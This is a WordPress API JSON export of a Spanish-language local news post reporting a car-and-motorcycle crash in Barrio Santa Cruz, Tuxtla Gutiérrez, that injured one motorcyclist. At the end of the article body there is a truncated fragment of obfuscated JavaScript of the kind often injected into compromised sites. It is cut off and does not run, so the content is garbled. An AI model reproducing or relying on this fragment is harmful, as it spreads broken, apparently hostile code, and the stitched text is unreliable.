{"id":16258,"date":"2024-06-21T04:00:16","date_gmt":"2024-06-21T04:00:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16258"},"modified":"2024-06-21T04:00:17","modified_gmt":"2024-06-21T04:00:17","slug":"un-lesionado-deja-choque-en-el-barrio-santa-cruz","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16258","title":{"rendered":"Un lesionado deja choque en el Barrio Santa Cruz"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"16260\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718942282227-1024x768.jpg\" alt=\"\" class=\"wp-image-16260\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718942282227-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718942282227-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718942282227-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718942282227.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"16259\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718942285191-1024x576.jpg\" alt=\"\" class=\"wp-image-16259\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718942285191-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718942285191-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718942285191-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718942285191.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 20 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un lesionado fue el saldo de un accidente ocurrido este jueves en la ma\u00f1ana en el Barrio Santa Cruz entre un Renault Kwid de color blanco de la empresa Megacable, y una Motocicleta Italika de color negro.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando el motociclista de unos 45 a\u00f1os de edad circulaba en la 4a Sur de Oriente a Poniente y al llegar a la 15 Oriente la unidad le hizo corte de circulaci\u00f3n.<\/p>\n\n\n\n<p>El coche se desplazaba de Norte a Sur y al intentar incorporarse a la Avenida provoc\u00f3 la colisi\u00f3n.<\/p>\n\n\n\n<p>Por el impacto el motociclista sali\u00f3 volando y se estrell\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>El lesionado fue trasladado a un nosocomio particular para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Al no llegar a un acuerdo armonioso las dos unidades fueron trasladados a un corral\u00f3n para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 20 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un lesionado fue el saldo de un accidente ocurrido este jueves en la ma\u00f1ana en el Barrio Santa Cruz entre un Renault Kwid de color blanco de la empresa Megacable, y una Motocicleta Italika de color negro. De acuerdo con los reportes oficiales &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16259,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-16258","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16258","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16258"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16258\/revisions"}],"predecessor-version":[{"id":16261,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16258\/revisions\/16261"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16259"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16258"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16258"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}